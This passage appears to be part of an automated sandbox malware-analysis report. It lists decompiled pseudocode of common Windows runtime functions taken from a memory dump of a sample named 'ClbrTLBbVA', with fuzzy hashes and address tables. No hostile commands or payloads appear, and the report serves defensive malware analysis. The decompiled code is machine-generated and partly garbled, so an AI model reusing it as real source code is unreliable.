                                        0x016c009b
                                        0x016c00f8
                                        0x016c00fb
                                        0x016c00fc
                                        0x016c00ff
                                        0x016c0108
                                        0x016c0108
                                        0x016c00a2
                                        0x016c00a6
                                        0x016c00b3
                                        0x016c00bc
                                        0x016c00c5
                                        0x016c00ca
                                        0x0170c01e
                                        0x00000000
                                        0x00000000
                                        0x0170c02d
                                        0x016c00d5
                                        0x016c00d9
                                        0x0170c03d
                                        0x0170c046
                                        0x0170c046
                                        0x016c00df
                                        0x016c00e2
                                        0x016c00ea
                                        0x016c00ef
                                        0x016c00f2
                                        0x016c00f6
                                        0x016c0111
                                        0x016c0117
                                        0x016c0117
                                        0x00000000
                                        0x016c00f6
                                        0x016c00d0
                                        0x016c00d0
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0522bddff4b50c9dc6faf32cb050c1c9d2d833f8c601074d7b84fb395daeb107
                                        • Instruction ID: ce917401226cdfec4adc4b318bbb3fe81e436ed6766206962c6f52881b8fa06a
                                        • Opcode Fuzzy Hash: 0522bddff4b50c9dc6faf32cb050c1c9d2d833f8c601074d7b84fb395daeb107
                                        • Instruction Fuzzy Hash: 7E318E35701B04CFD722CB28CD44B66B7E5FF89714F15456DE59687B90EB35A802CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01726C0A Relevance: .1, Instructions: 79COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 77%
                                        			E01726C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E016C7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x1797b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L016C4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E016EF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E016C7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E016E9AE0();
						_t23 = L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                        0x01726c0a
                                        0x01726c0f
                                        0x01726c10
                                        0x01726c13
                                        0x01726c15
                                        0x01726c19
                                        0x01726c1c
                                        0x01726c21
                                        0x01726c28
                                        0x01726c3a
                                        0x01726c2a
                                        0x01726c33
                                        0x01726c33
                                        0x01726c3f
                                        0x01726c48
                                        0x01726c4d
                                        0x01726c60
                                        0x01726c65
                                        0x01726c69
                                        0x01726c73
                                        0x01726c79
                                        0x01726c7f
                                        0x01726c86
                                        0x01726c90
                                        0x01726c94
                                        0x01726ca6
                                        0x01726cb2
                                        0x01726cbd
                                        0x01726cbd
                                        0x01726cc3
                                        0x01726cc7
                                        0x01726ccb
                                        0x01726cd0
                                        0x01726cd1
                                        0x01726ce2
                                        0x01726ce2
                                        0x01726c69
                                        0x01726ced

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: adf89cc6b263efd3537ff4dd1f6ea0f62ec11d623a1965721675a3622de30fcc
                                        • Instruction ID: 76c13843b4a96dd8783d04089869c1934a0742fcffba8833f9dd839dfca9603e
                                        • Opcode Fuzzy Hash: adf89cc6b263efd3537ff4dd1f6ea0f62ec11d623a1965721675a3622de30fcc
                                        • Instruction Fuzzy Hash: DE21ABB2A00655AFD715DB68D884E2AB7B8FF48700F0400AAF905C7790D634ED51CBA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016E90AF Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 82%
                                        			E016E90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E016FD4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E016DE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L016C4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E016EF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E016DA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                        0x016e90af
                                        0x016e90b8
                                        0x016e90bb
                                        0x016e90bf
                                        0x016e90c2
                                        0x016e90c2
                                        0x016e90c8
                                        0x016e90cb
                                        0x016e90cd
                                        0x017214d7
                                        0x017214eb
                                        0x017214eb
                                        0x00000000
                                        0x017214eb
                                        0x017214db
                                        0x017214e6
                                        0x00000000
                                        0x017214f2
                                        0x017214e8
                                        0x00000000
                                        0x017214e8
                                        0x016e90d8
                                        0x016e90da
                                        0x016e90dd
                                        0x016e90e5
                                        0x00000000
                                        0x016e9139
                                        0x016e90fa
                                        0x016e90fe
                                        0x016e9142
                                        0x00000000
                                        0x016e9142
                                        0x016e9104
                                        0x016e9107
                                        0x016e910b
                                        0x016e9110
                                        0x016e9118
                                        0x016e9147
                                        0x016e9148
                                        0x016e914f
                                        0x016e9150
                                        0x016e9151
                                        0x016e9152
                                        0x016e9156
                                        0x016e915d
                                        0x016e9160
                                        0x016e9168
                                        0x016e916c
                                        0x016e91bc
                                        0x016e91be
                                        0x00000000
                                        0x016e91be
                                        0x016e916e
                                        0x016e9173
                                        0x016e9176
                                        0x00000000
                                        0x00000000
                                        0x016e917c
                                        0x016e9180
                                        0x016e91b5
                                        0x00000000
                                        0x016e91b5
                                        0x016e9182
                                        0x016e9185
                                        0x016e9189
                                        0x00000000
                                        0x00000000
                                        0x016e918e
                                        0x016e9190
                                        0x016e9198
                                        0x00000000
                                        0x00000000
                                        0x016e91a0
                                        0x00000000
                                        0x016e91ad
                                        0x016e91ad
                                        0x016e91b0
                                        0x016e91b1
                                        0x00000000
                                        0x016e9185
                                        0x016e911a
                                        0x016e911c
                                        0x016e911f
                                        0x016e9125
                                        0x016e9127
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                        • Instruction ID: 33543b6b64138acd080dffbcb30c3e0662490db798f377cf7d1210629126c6a4
                                        • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                        • Instruction Fuzzy Hash: 352180B1A01315EFDB21DF59C848AAAFBF8EF54754F15896EE949A7200D330ED01CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016D3B7A Relevance: .1, Instructions: 75COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 59%
                                        			E016D3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x17984c4; // 0x0
				_v12 = 1;
				_v8 =  *0x17984c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L016C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x17984c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E016EAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E016EFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x17984c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x17984c4; // 0x0
					L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                        0x016d3b89
                                        0x016d3b96
                                        0x016d3ba1
                                        0x016d3bab
                                        0x016d3bb5
                                        0x016d3bb9
                                        0x01716298
                                        0x016d3bbf
                                        0x016d3bc2
                                        0x016d3bc3
                                        0x016d3bc9
                                        0x016d3bca
                                        0x016d3bcc
                                        0x016d3bcd
                                        0x016d3bd4
                                        0x016d3bd6
                                        0x016d3bdb
                                        0x016d3bea
                                        0x016d3bf7
                                        0x016d3bfb
                                        0x016d3bff
                                        0x016d3c09
                                        0x016d3c0a
                                        0x016d3c0b
                                        0x016d3c0f
                                        0x016d3c14
                                        0x016d3c18
                                        0x016d3c18
                                        0x016d3bfb
                                        0x016d3c1b
                                        0x016d3c30
                                        0x016d3c30
                                        0x016d3c3d

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cf1494e977733a160a8be60aa44705acd9567b1493217a83a2e9d1a5577de8ce
                                        • Instruction ID: 0240dbf1748e67cf4e2f53d485abf763f6f7570474d797495eb00e844c4042df
                                        • Opcode Fuzzy Hash: cf1494e977733a160a8be60aa44705acd9567b1493217a83a2e9d1a5577de8ce
                                        • Instruction Fuzzy Hash: FC2180B2A00119EFC710DF58CD81BAABBBDFB44618F154168E904AB251D771AD068B94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01726CF0 Relevance: .1, Instructions: 74COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 80%
                                        			E01726CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E016C7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E016C7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x1685c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E016DF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E016DF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E01727016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L016C2400( &_v52);
								}
								_t21 = L016C2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                        0x01726cfb
                                        0x01726d00
                                        0x01726d02
                                        0x01726d06
                                        0x01726d0a
                                        0x01726d0e
                                        0x01726d19
                                        0x01726d2b
                                        0x01726d1b
                                        0x01726d24
                                        0x01726d24
                                        0x01726d33
                                        0x01726d39
                                        0x01726d46
                                        0x01726d4f
                                        0x01726d61
                                        0x01726d51
                                        0x01726d5a
                                        0x01726d5a
                                        0x01726d69
                                        0x01726d6b
                                        0x01726d6d
                                        0x01726d6f
                                        0x01726d6f
                                        0x01726d74
                                        0x01726d79
                                        0x01726d7a
                                        0x01726d7f
                                        0x01726d82
                                        0x01726d88
                                        0x01726d89
                                        0x01726d90
                                        0x01726d94
                                        0x01726da7
                                        0x01726db1
                                        0x01726db1
                                        0x01726dbb
                                        0x01726dbb
                                        0x01726d90
                                        0x01726d69
                                        0x01726d46
                                        0x01726dc6

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4f7d7d71576e2a6cd1625e37fe7e976a1db99a1ba1b1c407c0d7c72154d8e3a7
                                        • Instruction ID: 2dd194476af1e0da9f116f702f59f27c2451b2c21d035696832499e089bf8dcb
                                        • Opcode Fuzzy Hash: 4f7d7d71576e2a6cd1625e37fe7e976a1db99a1ba1b1c407c0d7c72154d8e3a7
                                        • Instruction Fuzzy Hash: ED21D3729006999BDB11DF28C944B67FBECEF91640F04055AFD40C7251EB34D58AC6A2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0177070D Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 67%
                                        			E0177070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E017707DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0176AFDE( &_v8,  &_v12);
					E01771293(_t38, _v28, _t60);
					if(E016C7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E017614FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                        0x0177071b
                                        0x01770724
                                        0x01770734
                                        0x01770738
                                        0x0177074b
                                        0x0177074b
                                        0x01770753
                                        0x01770753
                                        0x01770759
                                        0x0177075d
                                        0x01770774
                                        0x01770779
                                        0x0177077d
                                        0x01770789
                                        0x01770795
                                        0x017707a7
                                        0x01770797
                                        0x017707a0
                                        0x017707a0
                                        0x017707af
                                        0x017707c4
                                        0x017707cd
                                        0x017707cd
                                        0x017707af
                                        0x017707dc

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                        • Instruction ID: 86a5834614d7c590da4ab65887f16414e1f7bc1e573884c541971ea7b9adf55e
                                        • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                        • Instruction Fuzzy Hash: 792134362042009FDB05DF1CC884B6AFBA5EFD1310F04856DF9959B385C730D819CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01727794 Relevance: .1, Instructions: 70COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 82%
                                        			E01727794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x1797b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L016C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E016EF3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E016C7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E016E9AE0();
					_t24 = L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                        0x01727799
                                        0x0172779a
                                        0x0172779b
                                        0x017277a3
                                        0x017277ab
                                        0x017277ae
                                        0x017277b1
                                        0x017277b1
                                        0x017277bf
                                        0x017277c4
                                        0x017277c8
                                        0x017277ce
                                        0x017277d4
                                        0x017277e0
                                        0x017277e0
                                        0x017277d6
                                        0x017277d6
                                        0x017277de
                                        0x00000000
                                        0x00000000
                                        0x017277de
                                        0x017277e5
                                        0x017277f0
                                        0x017277f3
                                        0x017277f6
                                        0x017277fd
                                        0x01727800
                                        0x0172780c
                                        0x01727818
                                        0x0172782b
                                        0x0172781a
                                        0x01727823
                                        0x01727823
                                        0x01727830
                                        0x01727831
                                        0x01727838
                                        0x0172783d
                                        0x0172783e
                                        0x0172784f
                                        0x0172784f
                                        0x0172785a

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1bef0efe8093052243622fa01c999cca5ad9087b7bbe93b0b2decdf264339074
                                        • Instruction ID: 5ffe8b97a2049d2153e3013f0cf1789ad9491c86a7077b842f287de51562e3e7
                                        • Opcode Fuzzy Hash: 1bef0efe8093052243622fa01c999cca5ad9087b7bbe93b0b2decdf264339074
                                        • Instruction Fuzzy Hash: 9E21F072900654AFC729DF69DC84E6BBBB9EF58740F10016DFA0AC7750D634E901CBA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016CAE73 Relevance: .1, Instructions: 70COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 96%
                                        			E016CAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E016C7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E016C7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E016C7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E016C7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E01727794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                        0x016cae78
                                        0x016cae7c
                                        0x016cae7e
                                        0x016cae81
                                        0x016cae86
                                        0x016cae8d
                                        0x01712691
                                        0x016cae93
                                        0x016cae93
                                        0x016cae93
                                        0x016cae98
                                        0x016cae9d
                                        0x017126a2
                                        0x017126b4
                                        0x017126a4
                                        0x017126ad
                                        0x017126ad
                                        0x017126b9
                                        0x00000000
                                        0x017126bb
                                        0x00000000
                                        0x017126bb
                                        0x016caea3
                                        0x016caea3
                                        0x016caea3
                                        0x016caeaa
                                        0x017126c0
                                        0x017126c9
                                        0x017126c9
                                        0x016caeb3
                                        0x017126d4
                                        0x017126e1
                                        0x00000000
                                        0x00000000
                                        0x017126e7
                                        0x017126ee
                                        0x017126f0
                                        0x017126f9
                                        0x017126f9
                                        0x01712702
                                        0x01712708
                                        0x01712708
                                        0x0171270b
                                        0x0171270f
                                        0x01712711
                                        0x01712711
                                        0x01712725
                                        0x01712725
                                        0x00000000
                                        0x016caeb9
                                        0x016caeb9
                                        0x016caebf
                                        0x016caebf
                                        0x016caeb3

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                        • Instruction ID: 683fa0e214f685fb3cbc9b2a71478eb446faaeced0979df4663551c4eadcc426
                                        • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                        • Instruction Fuzzy Hash: 36212672601685CFE7169BACDD44B35BBE9EF04B40F2904A8DD048B7A7E734DC41CA94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016DFD9B Relevance: .1, Instructions: 69COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 93%
                                        			E016DFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E016B76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L016C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                        0x016dfd9b
                                        0x016dfda0
                                        0x016dfda1
                                        0x016dfdab
                                        0x016dfdad
                                        0x016dfdb0
                                        0x016dfdb8
                                        0x016dfe0f
                                        0x016dfde6
                                        0x016dfde9
                                        0x016dfdec
                                        0x0171c0c0
                                        0x016dfdfe
                                        0x016dfe06
                                        0x016dfe06
                                        0x0171c0c8
                                        0x016dfe2d
                                        0x016dfe2d
                                        0x00000000
                                        0x016dfe2d
                                        0x0171c0d1
                                        0x0171c0e0
                                        0x0171c0e5
                                        0x0171c0e5
                                        0x0171c0e8
                                        0x00000000
                                        0x0171c0e8
                                        0x016dfdf4
                                        0x00000000
                                        0x00000000
                                        0x016dfdf6
                                        0x016dfdfa
                                        0x016dfe1a
                                        0x016dfe1f
                                        0x016dfe1f
                                        0x016dfdfc
                                        0x00000000
                                        0x016dfdfc
                                        0x016dfdcc
                                        0x016dfdd0
                                        0x016dfe26
                                        0x00000000
                                        0x016dfe26
                                        0x016dfdd8
                                        0x016dfddb
                                        0x016dfddd
                                        0x016dfde0
